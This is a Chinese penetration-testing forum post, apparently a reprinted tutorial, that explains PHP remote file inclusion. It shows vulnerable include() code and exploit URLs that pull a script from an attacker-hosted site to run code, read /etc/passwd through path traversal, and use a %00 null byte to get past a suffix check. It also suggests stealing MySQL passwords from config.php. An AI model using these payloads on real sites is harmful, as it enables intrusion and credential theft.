中国网络渗透测试联盟
标题:
PHP远程包含
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
PHP远程包含
, K2 ^6 A+ Q) [, P' M% F
php远端档包含漏洞基本
. i x% V5 K" o. n4 R
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
" x# m5 F: P N7 D) s b
本帖隐藏的内容需要回复才可以浏览
, R7 Q* H1 a9 O1 h% n6 E ~- C
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
4 o S, U1 c. ]4 B8 t
1.找出bug:
5 L* ~& i2 K2 m8 \
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
& B' x% l" G2 }# [0 P7 ~
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
$ G/ X0 u' I+ L- x, U% _
我们先看这个,当用户输入通过后就包含档,也就是
; M G, [9 U0 v* X. q) W
if ($_GET) {
t) @; v/ w0 j( a; e" \ E
include $_GET;
3 V3 A( ?* x- F. P
} else {
" U l" A& Q! f* c4 T* y/ X
include "home.php";
# G' F' U& E9 z! D1 O+ n& A
}
$ V- Y9 m( ^% r8 Z t
这种结构在动态网站里是常见的,问题是它允许这样
http://www.target.com
/explame.php?page=main.php或者
http://www.target.com/explame.php?
page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
8 g. W( U& `! Z+ d% {! \/ Y7 e
2.测试
6 H" b$ l- W$ D
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
; H- d8 t( P5 x; N
http://www.target.com/explame.php?page=zizzy
! t+ H) {! n( P' f) }
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
" A/ r: t; c3 ]
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
) q: t I; [1 p; ]( t
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
4 \* f& N6 a! G' z4 C
3.利用
( m. k4 i | z& l: d; n
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上
http://www.mysite.com/yeah.txt.
内容这样
|" ]$ T( \6 P+ o7 v& z6 \2 ]
<?
! s# P: r D; B* X, B Q
echo "Wow,test!";
6 |5 z; A/ I0 ?. D0 n+ e
?>
" I8 \; w% z. ?
那么
http://www.target.com/explame.php?pa...e.com/yeah.txt
0 O) R4 f1 p) R, W$ d& ]; H9 P( m, o, u
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
: y2 d2 b& [' C8 `
4.另一种
6 T/ z; ?1 n9 ]% b* _
有时程式师换种写法,写成这样,限制了包含范围
- F' ?. O3 d$ u# O* s
if ($_GET) {
, c+ ~* H7 O0 b3 z
include "$_GET.php";
' k; I7 Y/ U* M7 _& }8 G/ [
} else {
; v8 c2 ]# \6 X( F6 r/ r( y
include "home.php";
) Y1 U4 T/ V+ A. m* `( [, b
}
! p& |2 d0 M. R6 n% y
我们提交
http://www.target.com/explame.php?pa...e.com/yeah.txt
" s+ k$ Z8 O1 \. W
Warning: main(
http://www.mysite.com/yeah.txt.php
): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
" ~: ^9 r- z. y3 ^
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
' f4 q1 t! w4 K( C' Y
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
/ G" C4 B$ R* t
那passwd怎么办
, U: f8 }: S* B7 R! | Q" u6 ^
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
$ E' R- X* Y2 ~( m% o
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
B+ f; e/ ?+ K7 A; X' j
在这里使用个NUL字元,也就是%00来跳过检测
0 B2 O, Y7 H& t! Q
http://www.target.com/explame.php?pa.../etc/passwd%00
* N* g/ z' D( l a
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2